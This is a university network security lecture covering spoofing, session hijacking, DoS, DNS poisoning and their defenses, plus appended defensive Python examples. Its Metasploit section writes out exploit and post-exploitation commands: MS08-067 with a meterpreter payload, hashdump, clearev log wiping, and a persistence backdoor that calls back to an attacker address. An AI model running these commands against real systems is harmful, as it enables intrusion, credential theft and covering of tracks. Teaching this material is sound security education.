Network Security
CPSC6128 – Lecture 3
Attacks, Vulnerabilities and Exploits
CPSC 6128 - Network Security

Network Attack Methodology
• Recon – Information gathering
• Scanning – Enumeration
• Vulnerability Identification
• Exploit
  • Gaining access
  • Elevating given access
  • Application/Web level attacks
  • Denial of Service (DOS)
• Post Exploitation
  • Maintaining Access
  • Removing Forensic Evidence
  • Exfiltration

GENERAL NETWORK ATTACK TECHNIQUES

IP address spoofing (1)
[Diagram: host 145.13.145.67 sends a packet with SA: 36.220.9.59, DA: 212.68.212.7 to 212.68.212.7]
• Attacker doesn’t want actions traced back
• Simply re-configure IP address in Windows or Unix
• Or enter spoofed address in an application, e.g., decoy packets with Nmap

IP address spoofing (2)
[Diagram: attacker 145.13.145.67 sends SA: 36.220.9.59, DA: 212.68.212.7 to victim 212.68.212.7; the reply SA: 212.68.212.7, DA: 36.220.9.59 goes to 36.220.9.59]
• But attacker cannot interact with victim
• Unless attacker is on path between victim and spoofed address

IP spoofing with TCP?
• Can an attacker make a TCP connection to server with a spoofed IP address?
• Not easy
• Sequence numbers are negotiated between sender and receiver to ensure that packets are part of an established connection
• If attacker can guess initial sequence number, can attempt to inject into the conversation
• But TCP uses random initial sequence numbers
• Poor implementations of TCP, however, can allow the sequence #’s to be predictable

Defense: Egress/Ingress filtering
[Diagrams: Egress Filtering and Ingress Filtering, each showing a packet with source 127.32.1.1 blocked (x) between the Internet and network 222.22/16]

Ingress Filtering: Upstream ISP (1)
[Diagram: one regional ISP serves 12.12/24 and 34.34/24 and sends the tier-1 ISP “BGP update: 12.12/24, 34.34/24”; another regional ISP serves 56.56/24 and 78.78/24 and sends “BGP update: 56.56/24, 78.78/24”]

Ingress Filtering: Upstream ISP (2)
[Diagram: same topology]
• BGP update: 12.12/24, 34.34/24: filter all traffic but 12.12/24 and 34.34/24
• BGP update: 56.56/24, 78.78/24: filter all traffic but 56.56/24 and 78.78/24

Ingress Filtering: Upstream ISP (3)
[Diagram: same topology; a packet with source 56.56.1.1 is blocked (x) by “Filter all but 12.12/24 and 34.34/24”]

Ingress Filtering: Upstream ISP (4)
[Diagram: same topology; a packet with source 34.34.1.1 passes “Filter all but 12.12/24 and 34.34/24”]
• Spoofed packet gets through!

Ingress/Egress filtering: Summary
• Effectiveness depends on widespread deployment at access ISPs
• Deployment in upstream ISPs helps, but does not eliminate IP spoofing
• Even if universally deployed at access, hacker can still spoof another address in its access network 12.12/24
• See RFC 2827 “Network Ingress Filtering: Defeating DDoS”

Attack: TCP Session Hijacking
• A technique used to gain access to Internet servers
• It was first used by Kevin Mitnick to gain access to Tsutomu Shimomura's workstation in 1995
• Take control of one side of a TCP connection
• Marriage of sniffing and spoofing
[Diagram: Alice has a telnet session to Bob; Attacker]

TCP Session Hijacking: Limitation
[Diagram: Alice, Bob, Attacker. 1. weird ACK # for data never sent; 2. to resync, Alice sends segment with correct seq #]
• Bob is getting segments from attacker and Alice. Source IP address same, but seq #’s different. Bob likely drops connection.
• Attacker’s solutions:
  1) Overwrite IP-to-MAC ARP tables, then Alice’s segments will not reach Bob and vice-versa
  2) DOS attack Alice so her machine won’t see erroneous replies from Bob
  3) Older method was to use IP source routing to route packets back to attacker

Session hijacking: The details
• Attacker and Alice are on the same network segment where traffic passes from Alice to Bob, as well as to the attacker
• Attacker can sniff the packets and see TCP packets between Bob and Alice and their sequence numbers
• Attacker jumps in, sending TCP packets to Bob
  • source IP address = Alice’s IP address
• Bob now obeys commands sent by attacker, thinking they were sent by Alice
• Principal defense
  • Encryption with authentication protocol
  • Attacker does not have keys to decrypt and insert meaningful traffic
• What if the attacker and Alice are not on the same network segment?
• Very complex, please read the handout – TCP Session Hijacking
• Tools used
  • Juggernaut (Linux)
  • Hunt (Unix based)
  • T-Sight (Windows OS)

HTTP Session Hijacking
[Diagram: Client, Web Server and Attacker; HTTP Session ID: ADEF78DDC543DDDE]
• Involves obtaining the HTTP Session ID
• The ID can be found in cookies and URLs
• Called Sidejacking if sniffed

Firesheep – HTTP Sidejacking
• Not downloaded, but handout.

Denial-of-Service Attacks
• Prevent access by legitimate users or stop critical system processes
• Vulnerability attack
  • Send a few crafted messages to target app that has vulnerability
  • Malicious messages called the “exploit”
  • Remotely stopping or crashing services
• Connection flooding
  • Overwhelming connection queue with SYN flood
• Bandwidth flooding attack
  • Overwhelming communications link with packets
  • Strength in flooding attack lies in volume rather than content

DoS and DDoS
• DoS:
  • source of attack small # of nodes
  • source IP typically spoofed
• DDoS
  • From thousands of nodes
  • IP addresses often not spoofed
  • Often implemented as a Botnet

Interlude: IP datagram format
[Figure: IP datagram layout, 32 bits wide, one row per line]
• ver | head. len | type of service | length
• 16-bit identifier | flgs | fragment offset
• time to live | upper layer | Internet checksum
• 32 bit source IP address
• 32 bit destination IP address
• Options (if any)
• data (variable length, typically a TCP or UDP segment)
Field annotations:
• head. len: header length (bytes)
• type of service: “type” of data
• length: total datagram length (bytes)
• 16-bit identifier, flgs, fragment offset: for fragmentation/reassembly
• time to live: max number remaining hops (decremented at each router)
• upper layer: upper layer protocol to deliver payload to

IP Fragmentation and Reassembly
• Example
  • 4000 byte datagram
  • MTU = 1500 bytes
• One large datagram becomes several smaller datagrams
  • Original: length = 4000, ID = x, fragflag = 0, offset = 0
  • Fragment 1: length = 1500, ID = x, fragflag = 1, offset = 0 (1480 bytes in data field)
  • Fragment 2: length = 1500, ID = x, fragflag = 1, offset = 185 (offset = 1480/8)
  • Fragment 3: length = 1040, ID = x, fragflag = 0, offset = 370

DoS: examples of vulnerability attacks
• Land: sends spoofed packet with source and dest address/port the same
• Ping of death: sends oversized ping packet
• Teardrop, Newtear, Bonk, Syndrop: tools send overlapping segments, that is, fragment offsets incorrect.
• Jolt2: sends a stream of fragments, none of which have fragflag set to 0. Rebuilding consumes all processor capacity.
• Patches fix the problem, but malformed packet attacks continue to be discovered.

Connection flooding: Overwhelming connection queue w/ SYN flood
• Send SYN packet: Recall client sends SYN packet with initial seq. number when initiating a connection.
• Allocate memory: TCP on server machine allocates memory on its connection queue, to track the status of the new half-open connection.
• Wait for ACK: For each half-open connection, server waits for ACK segment, using a timeout that is often > 1 minute
• Attack: Send many SYN packets
  • Fill up connection queue with half-open connections
  • Can spoof source IP address
  • When connection queue is exhausted no new connections can be initiated by legit users.

DoS: Overwhelming connection queue with SYN flood
[Diagram: attacker, victim, Alice]
• Amateur attack:
  • Connection queue freed up with RST segment
• Expert attack:
  • Use multiple source IP addresses
  • Each from unresponsive addresses

SYN flood defense: SYN cookies (1)
[Diagram: Client sends SYN with ISN_A to Web Server; Web Server replies SYN-ACK with ISN_B = cookie]
• When SYN segment arrives, server calculates function (hash) based on:
  • Source and destination IP addresses and port numbers, MSS (Max Segment Size) and a slowly incrementing timestamp
  • Hash output 32 bits
• Server uses resulting “cookie” for its initial seq # (ISN) in SYN-ACK
• Server does not allocate anything to half-open connection:
  • Does not remember client’s ISN
  • Does not remember cookie

SYN flood defense: SYN cookies (2)
• If SYN is legitimate
  • Client returns final ACK w/ Seq# = ISN(of server)+1
  • Server computes same function, verifies function = SEQ # in ACK segment
• If SYN-flood attack with spoofed IP address
  • No ACK comes back to server for connection.
  • No problem: server is not waiting for an ACK and has no resources allocated
• Legit connection established without the need for half-open connections

Another Attack: Overwhelming link bandwidth with packets
• Attack traffic can be made similar to legitimate traffic, hindering detection.
• Flow of traffic must consume target’s bandwidth resources
  • Attacker needs to engage more than one machine => DDoS
• May be easier to get target to fill up its upstream bandwidth: async access

Example: Distributed DoS
• Attacker takes over many machines, called “bots”.
• Potential bots are machines with vulnerabilities.
[Diagram: attacker, several bots, Internet, victim]
• Bot processes wait for command from attacker to flood a target

Example: LOIC (try it)

DDoS using DNS Server – Amplification Attack
[Diagram: attacker sends requests with Source IP = Victim’s IP to several DNS servers; the DNS servers’ replies go to the victim]

DDoS: Amplification Attack
• Spoof source IP address = victim’s IP
• Goal: generate lengthy or numerous replies for short requests: Amplification
• Amplification Attack can also be done with Web and other services

DDoS Defenses
• Don’t let your systems become bots
  • Keep systems patched up
  • Employ egress anti-spoof filtering on external router
• Filter dangerous packets
• Signature and anomaly detection and filtering
• Rate limiting
  • Limit # of packets sent from source to dest
• To avoid vulnerability attacks
  • Using intrusion prevention systems
• Over-provisioning of resources
  • Abundant bandwidth
  • Large pool of servers
  • ISP needs abundant bandwidth too
  • Multiple ISPs

DNS attacks
• Reflector attack
  • Leverage DNS for attacks on arbitrary targets - DDOS
• Denying DNS service
  • Stop DNS root servers
  • Stop top-level-domain servers (e.g. .com domain)
  • Stop local (default name servers)
• Use fake DNS replies to redirect user
• Poisoning DNS
  • Insert false resource records into various DNS caches
  • False records contain IP addresses operated by attackers

DDOS DNS Attack Against Root Servers Example
• Oct 21, 2002
  • Ping packets sent from bots to the 13 DNS root servers
  • Goal: bandwidth flood servers
• Minimize impact:
  • DNS caching
  • Rate limiting at upstream routers: filter ping when they arrive at an excessive rate
• Root server attack is easy to defend
  • Download root server database to local (default) name servers
  • Not much data in root server; changes infrequently
• Similar kind of attack attempted in March 2012

DNS attack: redirecting
[Diagram: client, local DNS server and attacker on a hub or WiFi network]
1. Client sends DNS query to its local DNS server; sniffed by attacker
2. Attacker responds with bogus DNS reply
Issues:
• Must spoof IP address: set to local DNS server (easy)
• Must match reply ID with request ID (easy)
• May need to stop reply from the local DNS server (harder)

Poisoning DNS Cache
• Poisoning: attempt to put bogus records into DNS name server caches
  • Bogus records could point to attacker nodes
  • Attacker nodes could phish
• But unsolicited replies are not accepted at a name server
  • Name servers use IDs in DNS messages to match replies to queries
  • So can’t just insert a record into a name server by sending a DNS reply message.
• But can send a reply to a request.

Poisoning local DNS server
[Diagram: Client Connecting Remotely to CSU (csu = ColumbusState); Local ISP DNS Server for Client; authoritative DNS for csu.edu; Attacker 17.32.8.9. Labels: 1. DNS query www.csu.edu=?; 2. iterative DNS queries; 3. DNS reply www.csu.edu=17.32.8.9]
Goal: Put bogus IP address for poly.edu in local Berkeley DNS server
1) Attacker queries local DNS server
2) Local DNS makes iterative queries
3) Attacker waits for some time; sends a bogus reply, spoofing authoritative server for csu.edu.

Poisoning local DNS server (cont)
[Diagram: Client Connecting Remotely to CSU; Local ISP DNS Server for Client; authoritative DNS for csu.edu; Attacker 17.32.8.9. Labels: 1. DNS query www.csu.edu=?; 2. DNS response www.csu.edu=17.32.8.9; 3. http connection to 17.32.8.9]
• DNS response can provide IP address of malicious server!

DNS Poisoning (cont)
Issues:
• Attacker needs to know sequence number in request message sent to upstream server
  • Not easy!
• Attacker may need to stop upstream name server from responding
  • So that server under attack doesn’t get suspicious
  • Ping of death, DoS, overflows, etc

DNS attacks: Summary
• DNS is a critical component of the Internet infrastructure
• But is surprisingly robust
  • DDoS attacks against root servers have been largely unsuccessful
  • Poisoning and redirecting attacks are difficult unless you can sniff DNS requests
  • And even so, may need to stop DNS servers from replying
• DNS can be leveraged for reflection attacks against non-DNS nodes

TOOLS AND ATTACK IMPLEMENTATION

Vulnerability Scanners
• Vulnerability: a software bug or misconfiguration allowing for unauthorized access
• Original vulnerability scanner
  • It was called SATAN (Security Admin Tool for Analyzing Networks)
  • Written by Dan Farmer in 1995, employed by SGI at the time
  • Very controversial when released
  • It eventually resulted in SGI firing Dan Farmer
• Commercial scanners (currently)
  • ISS Internet Scanner
  • SAINT
  • Retina by eEye
  • Nessus by Tenable

Nessus
• Nessus project started by Renaud Deraison in 1998
• Very popular vulnerability scanner
• Oct 2005 founded Tenable security and changed to “closed source”
• Still free but with limited signature set
• OPEN-VAS is a fork of the original Nessus code and is still open source at http://www.openvas.org

Nessus Architecture (figure)

Nessus Plugin Selection (figure)

Nessus Scan Results (figure)

Web Vulnerability Scanners
• Nikto
  • Most popular
  • Looks for default files and configs as well as server misconfiguration
  • Provides versioning information
  • Runs on Linux or Windows
  • http://www.cirt.net

Nikto (figure)

Exploits Bought and Sold (figure)

Exploitation Tools
• Immunity Canvas
  • Commercial
  • http://www.immunitysec.com
• Core Impact
  • Commercial
  • http://www.coresecurity.com
• Metasploit
  • Open Source: http://www.metasploit.org
  • Recently acquired by Rapid7

Immunity Canvas
• Runs on Windows, OS X or Linux (Linux recommended)
• Currently over 370 exploits with an average of 4 exploits added each month
• Flexible payload options
  • Connect to sock or “call back”
  • MOSDEF session allows for arbitrary code execution
  • Can get screenshots, video, keylogging, etc.

Canvas Interface (figure)

Canvas Interface
• Red – Modules – Things that Canvas can do
• Purple – Things that Canvas knows about
• Yellow – Status Window, what Canvas is currently doing

Canvas Set Target (figure)

Canvas – Port Scan
• Canvas has reconnaissance tools and vulnerability assessment tools built in
• These can be supplemented by imports from other tools such as Nessus
• Here we can see that the scan reveals the usual Windows ports open

Canvas – Exploits
• Let’s try an SMB exploit

Canvas – Launch Exploit (figure)

Canvas – Success
• We Have Shell!

The Metasploit Framework
• Open Source Development Framework for
  • Penetration testing
  • Patch verification
  • Regression testing
  • Security Research
• Runs on Linux, Mac OS X, BSD, Windows
• Remote and local exploits
• Browser exploits
• Ability to create exploits
• Developed by HD Moore
• Recently “acquired” by Rapid7
  • All indications are that it will remain open source

Terms
• Vulnerability: weakness in a system which allows an attacker to reduce the system’s security posture
• Exploit: code which allows an attacker to take advantage of the vulnerability in the system
• Payload: the code which is delivered by the exploit
  • This is the code which actually runs on the victim system
  • Post exploitation
• Encoders: way to obfuscate the payload code so that anti-virus and IDS won’t detect
• Module: a small piece of code that can be added to the Metasploit Framework to execute an attack
• Auxiliary Module: other parts of Metasploit that aid in exploitation such as scanners

Why Metasploit Framework?
• Individual exploit code hard to manage, update and customize
  • No code reuse
• With a framework there is no need to customize exploits to match payload code
• Mix and match exploits and payloads easily
• Rapid development of new exploit code

Architecture Overview
[Diagram by HDMoore/MSF. Labels: Libraries (REX, Framework:Core, Framework:Base); Custom Plugins; Protocol Tools; Interfaces (msfweb, msfcli, msfconsole, msfgui, msfapi); Modules (exploits, payloads, encoders, nops, auxiliary); Security Tools; Web Interfaces; Services; Integration]

Different types of Payload
• Inline
  • A single payload containing the exploit and full shellcode for the selected task
  • Inline payloads are by design more stable than their counterparts because they contain everything all in one
  • However, some exploits won’t support the resulting size of these payloads
• Staged
  • Many exploitable situations constrain how many bytes an attacker may load into one contiguous location in memory
  • One way to do interesting post exploitation in these situations is to deliver the payload in stages
• Reverse
  • Instead of the attacker connecting to the payload on the exploited host, the payload on the exploited host connects back to the attacker
  • Good for inside firewalls.
• NoNX
  • The NX (No eXecute) bit is a feature built into some CPUs to prevent code from executing in certain areas of memory.
  • In Windows, NX is implemented as Data Execution Prevention (DEP)
  • The Metasploit NoNX payloads are designed to circumvent DEP
• PassiveX
  • A payload that can help in circumventing restrictive outbound firewalls
  • It does this by using an ActiveX control to create a hidden instance of Internet Explorer
  • Using the new ActiveX control, it communicates with the attacker via HTTP requests and responses

More About Payloads (cont)
• IPv6
  • IPv6 payload designed to work over IPv6
• Meterpreter
  • Short for Meta-Interpreter
  • An advanced, multi-faceted payload that operates via DLL injection
  • Resides completely in the memory of the remote host
  • Leaves no traces on the hard drive, making it very difficult to detect with conventional forensic techniques

Meterpreter
• Meta-Interpreter
• Advanced payload which operates via DLL injection
• Resides completely in memory
  • No hard disk writes at all
• Scripts and plugins supported
• Well supported and constant development
• Encrypted communications between the attacker and payload
• Remote command execution
• In-memory process migration
• Registry modifications
• Pivoting
• File system support and more

How it Works
• Exploit + 1st Stage Payload
• Payload Connects back to MSF
• 2nd Stage DLL Injection Payload Sent
• MSF Sends Meterpreter Server DLL
• Client and Server Communicate

Metasploit Interfaces
• MSFGUI
• MSFd
• MSFWeb
• MSFConsole
• MSFCLI
• Armitage

MsfConsole (figure)

MsfConsole Basics
• Interactive console for Metasploit
• Tab completion (double tap) to help type
• Can execute external commands
• Most flexible interface

Directory Structure
• Modules
  • What we will mainly be working with
  • Contain exploits, auxiliary, encoders
• Scripts
  • Extension scripts
  • Typically from 3rd parties.
  • “run checkvm”, “run getcountermeasure”, “run getgui” (Meterpreter scripts)
• Plugins
  • Location for your own exploits development
• External
  • Interfaces to external services such as a serial port
• Data
  • Data source for exploits
  • Dictionaries, wordlists, sql, snmp mibs, etc.

Modules
• Auxiliary
  • Tasks outside of direct exploitation such as port scanning, sniffing, etc
• Encoders
  • Various techniques for obfuscating payloads to avoid antivirus and IDS
• Exploits
  • Organized by OS
  • Ruby scripts containing the exploit code
• Nops
  • Nop sleds for various CPU architectures
• Post
  • Post exploitation scripts for data gathering, exfiltration
• Payloads
  • 3 types (singles, stagers, stages)
  • OS specific

Exploitation Basics – search exploits
• Identify vulnerability based on recon and possible output from vulnerability scanner (Nessus)
• Choose exploit which can take advantage of that vulnerability
• Use “search”
  • Example using MS08-067
• Play techno music in background

Exploitation Basics – use exploits
• “use” command followed by directory path
  • “use exploit/windows/smb/ms08_067_netapi”
  • Use tab completion (double tap)
• Display options required for exploit
  • “show options”

Exploitation Basics – Set PAYLOAD
• Select PAYLOAD to deliver after successful exploitation
• Can use tab completion to show options
• “set PAYLOAD windows/meterpreter/bind_tcp”
  • bind_tcp will listen for attacker to connect
  • Reverse payload will connect back to the attacker

Exploitation Basics – Set RHOST
• “show options” now shows PAYLOAD options
• “set” command will set the options
• “set RHOST 172.16.156.132”

Exploitation Basics – Finally, exploit
• “exploit” to run exploit
• Will open a session to target with prompt “meterpreter>”
• “background” will send session to the background
• “sessions -i 1” will return to the first session
• “execute -f cmd.exe -i -H” will have remote shell

Now What? - Post Exploitation
Meterpreter Basics
• Migrate
  • Migrates the meterpreter DLL injection to a different process
  • Explorer.exe is a good choice
• Sysinfo
  • Displays information about the target system
• Download
  • “download c:\\boot.ini” downloads from the target machine
  • Note double slashes
• Upload
  • “upload c:\\boot.ini c:\\windows\system32”, or “upload c:\\boot.ini yang” uploads file to the target machine
• Getuid
  • Returns the userid (permissions) that meterpreter is running
• Execute
  • “execute -f cmd.exe -i -H” runs command on the remote machine
  • “-i” runs the command interactively
  • “-H” hides the process from user
• Hashdump
  • Dumps the SAM database for offline cracking
• Clearev
  • Clears the Windows event logs
• MUCH MORE
  • See: http://www.offensive-security.com/metasploit-unleashed/

Pivoting
• Using one compromised machine to further exploit other hosts or networks
• Example would be a client side “drive by browser” attack
• Once the attacker owns this machine inside the firewall they can launch all further attacks from this compromised machine
[Diagram: Attacker, Compromised Machine, Target Machine]

Add Route to an Existing Session
• Add route from attacker machine to remote network
• “route add 10.100.100.0 255.255.255.0 1” adds a route to the remote network through meterpreter session 1
• Further attacks to 10.100.100.0 will traverse this session and the already exploited host

Persistence
• If remote target reboots, meterpreter session is lost
  • Might be ok if exploit is reliable
  • Just run again
  • However, this is usually not the case
• Two ways to perform persistence with Meterpreter
  • Persistence script
  • Metsvc
    • Set up a backdoor at the remote machine: use “run metsvc -A”
    • Remove backdoor: use “run metsvc -r”

Persistence Script
• Creates persistent backdoor which can be configured to connect back to attacker on system boot
• Creates a vbs file and registry key
• Can be uninstalled remotely
• “run persistence -A -L c:\\windows\system32 -X -i 10 -p 443 -r 192.168.1.10”

Metsvc backdoor
• Backdoor runs as a service on the target
• Attacker can connect to it remotely
• Less noisy compared to persistence script

“3rd Party” Rootkits
• Used for more advanced post exploitation
  • Hiding process, files, data exfil.
• http://www.rootkit.com
• HackerDefender
  • Written by Holy Father
  • Kernel mode rootkit
  • Holy Father offered custom builds of HD to bypass AV/IDS
  • Well understood – so we may use this in lab

Client Side Exploits
• Network side exploits are becoming more and more rare
• Attackers have moved to “client side” exploits
• Client-side exploits leverage software/applications running on the target system
  • Browser based attacks are common
  • Java also significant attack vector

Example Client Side Exploit (figure)

Example Client Side Exploit
    msf> exploit(apple_itunes_playlist) > exploit
    [*] Started reverse handler
    [*] Using URL: http://10.10.11.10:8080/mycoolplaylist.pls
    [*] Server started.
    [*] Exploit running as background job.
    msf> exploit(apple_itunes_playlist) >
    [*] Sending stage (474 bytes)
    [*] Command shell session 1 opened (10.10.21.10:65535 -> 192.168.113.10:1075)
    msf> exploit(apple_itunes_playlist) > sessions -i 1
    [*] Starting interaction with 1...
    Microsoft Windows XP [Version 5.1.2600]
    (C) Copyright 1985-2001 Microsoft Corp.
    C:\WINDOWS\System32\>

Armitage
• Type “armitage” from Backtrack
• Defaults ok
• Will start Metasploit and auto connect.
• Click YES when prompted to start Metasploit

Scanning
• Nmap built in
• MSF scans are Metasploit built-in scanning modules.
• Generally Nmap is better
• All found targets are automatically added to the target window

Exploitation
• Apply “Find Attack” either by Port or by Vulnerability first
• Right click target will bring up possible exploits
• Can also specify exploits and modules from the right hand menu

Exploitation
• When host is compromised it appears RED with Lightning
• Select “Interact”, then Command Shell access

Next Time
• Covering your tracks….
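
Added example (not part of the original slides), referring back to the “IP Fragmentation and Reassembly” and “DoS: examples of vulnerability attacks” slides: it reproduces the 4000-byte datagram / MTU 1500 split and checks a fragment train for the malformations those slides name (overlapping offsets, no fragment with fragflag 0, oversized reassembly). The 20-byte header, the 65535-byte limit check, the function names and the sample trains are assumptions constructed for illustration.

```python
IP_HEADER = 20          # bytes; assumes an IP header without options
MAX_DATAGRAM = 65535    # largest size the 16-bit total-length field can express


def fragment(total_length, mtu, header=IP_HEADER):
    """Split one datagram the way the slide does: offsets in 8-byte units."""
    payload = total_length - header
    per_fragment = (mtu - header) // 8 * 8      # data per fragment, multiple of 8
    fragments, sent = [], 0
    while sent < payload:
        chunk = min(per_fragment, payload - sent)
        more = 1 if sent + chunk < payload else 0
        fragments.append({"length": chunk + header,
                          "fragflag": more,
                          "offset": sent // 8})
        sent += chunk
    return fragments


def check_train(fragments, header=IP_HEADER):
    """Return the anomalies found in one fragment train (all sharing one ID)."""
    findings = []
    spans = sorted((f["offset"] * 8, f["offset"] * 8 + f["length"] - header)
                   for f in fragments)
    covered = 0
    for start, end in spans:
        if start < covered:
            findings.append("overlap")            # Teardrop/Newtear/Bonk/Syndrop pattern
        elif start > covered:
            findings.append("gap")                # a piece is missing
        covered = max(covered, end)
    if all(f["fragflag"] == 1 for f in fragments):
        findings.append("no-final-fragment")      # Jolt2 pattern: reassembly never ends
    if covered + header > MAX_DATAGRAM:
        findings.append("oversized")              # ping-of-death pattern
    return list(dict.fromkeys(findings))          # de-duplicate, keep order


# Constructed sample trains (metadata only, no packets are built or sent).
SLIDE_TRAIN = fragment(4000, 1500)
OVERLAPPING = [{"length": 60, "fragflag": 1, "offset": 0},
               {"length": 44, "fragflag": 0, "offset": 3}]
NO_FINAL = [{"length": 28, "fragflag": 1, "offset": 0},
            {"length": 28, "fragflag": 1, "offset": 1}]


def oversized_train():
    """A legal 65528-byte train whose last fragment claims too much data."""
    train = fragment(65528, 1500)
    train[-1]["length"] = 1500
    return train


if __name__ == "__main__":
    for name, train in [("slide", SLIDE_TRAIN), ("overlapping", OVERLAPPING),
                        ("no final", NO_FINAL), ("oversized", oversized_train())]:
        print(name, check_train(train))
```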
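
Added example (not from the lecture) for the two “SYN flood defense: SYN cookies” slides: a server that keeps no state derives its ISN from the addresses, ports, MSS and a slow timestamp, then validates the final ACK by recomputing the function. It goes beyond the slides by using the classic cookie layout (5-bit counter, 3-bit MSS index, 24-bit keyed hash); the key, the MSS table, the 64-second tick and the addresses are constructed assumptions.

```python
import hashlib
import hmac
import ipaddress
import struct

SECRET = b"constructed-demo-key"   # assumption: per-server secret key
TICK_SECONDS = 64                  # assumption: period of the slow timestamp
MAX_AGE_TICKS = 1                  # accept cookies from this tick or the previous one
MSS_TABLE = (216, 536, 1024, 1220, 1360, 1440, 1452, 1460)  # constructed 3-bit table


def _mac24(src_ip, src_port, dst_ip, dst_port, tick, mss_idx):
    """24-bit keyed hash over the 4-tuple, the tick and the MSS index."""
    msg = (ipaddress.ip_address(src_ip).packed
           + ipaddress.ip_address(dst_ip).packed
           + struct.pack("!HHIB", src_port, dst_port, tick & 0xFFFFFFFF, mss_idx))
    return int.from_bytes(hmac.new(SECRET, msg, hashlib.sha256).digest()[:3], "big")


def make_cookie(src_ip, src_port, dst_ip, dst_port, client_mss, now):
    """Server ISN for the SYN-ACK; nothing about the SYN is stored."""
    tick = int(now) // TICK_SECONDS
    # Largest table entry not above the client's MSS (index 0 if none fits).
    mss_idx = max((i for i, m in enumerate(MSS_TABLE) if m <= client_mss), default=0)
    mac = _mac24(src_ip, src_port, dst_ip, dst_port, tick, mss_idx)
    return ((tick & 0x1F) << 27) | (mss_idx << 24) | mac


def check_ack(src_ip, src_port, dst_ip, dst_port, ack_number, now):
    """Return the MSS if the final ACK echoes a valid, fresh cookie, else None."""
    cookie = (ack_number - 1) & 0xFFFFFFFF       # client echoes server ISN + 1
    tick5, mss_idx, mac = cookie >> 27, (cookie >> 24) & 0x7, cookie & 0xFFFFFF
    now_tick = int(now) // TICK_SECONDS
    for age in range(MAX_AGE_TICKS + 1):
        tick = now_tick - age
        if tick & 0x1F != tick5:
            continue                              # counter bits do not match this tick
        expected = _mac24(src_ip, src_port, dst_ip, dst_port, tick, mss_idx)
        if hmac.compare_digest(expected.to_bytes(3, "big"), mac.to_bytes(3, "big")):
            return MSS_TABLE[mss_idx]             # connection state can be created now
    return None


def demo():
    """Constructed exchange using documentation address ranges."""
    client, server = ("198.51.100.7", 40000), ("203.0.113.10", 80)
    t0 = 1_000_000
    isn_b = make_cookie(*client, *server, client_mss=1460, now=t0)
    ack = (isn_b + 1) & 0xFFFFFFFF
    return {
        "legit": check_ack(*client, *server, ack, now=t0 + 30),
        "other_source": check_ack("192.0.2.99", 40000, *server, ack, now=t0 + 30),
        "stale": check_ack(*client, *server, ack, now=t0 + 5 * TICK_SECONDS),
    }


if __name__ == "__main__":
    print(demo())
```

Because the cookie is bound to the 4-tuple and the tick, a SYN from a spoofed address costs the server one hash and no queue entry, which is the property the slides describe.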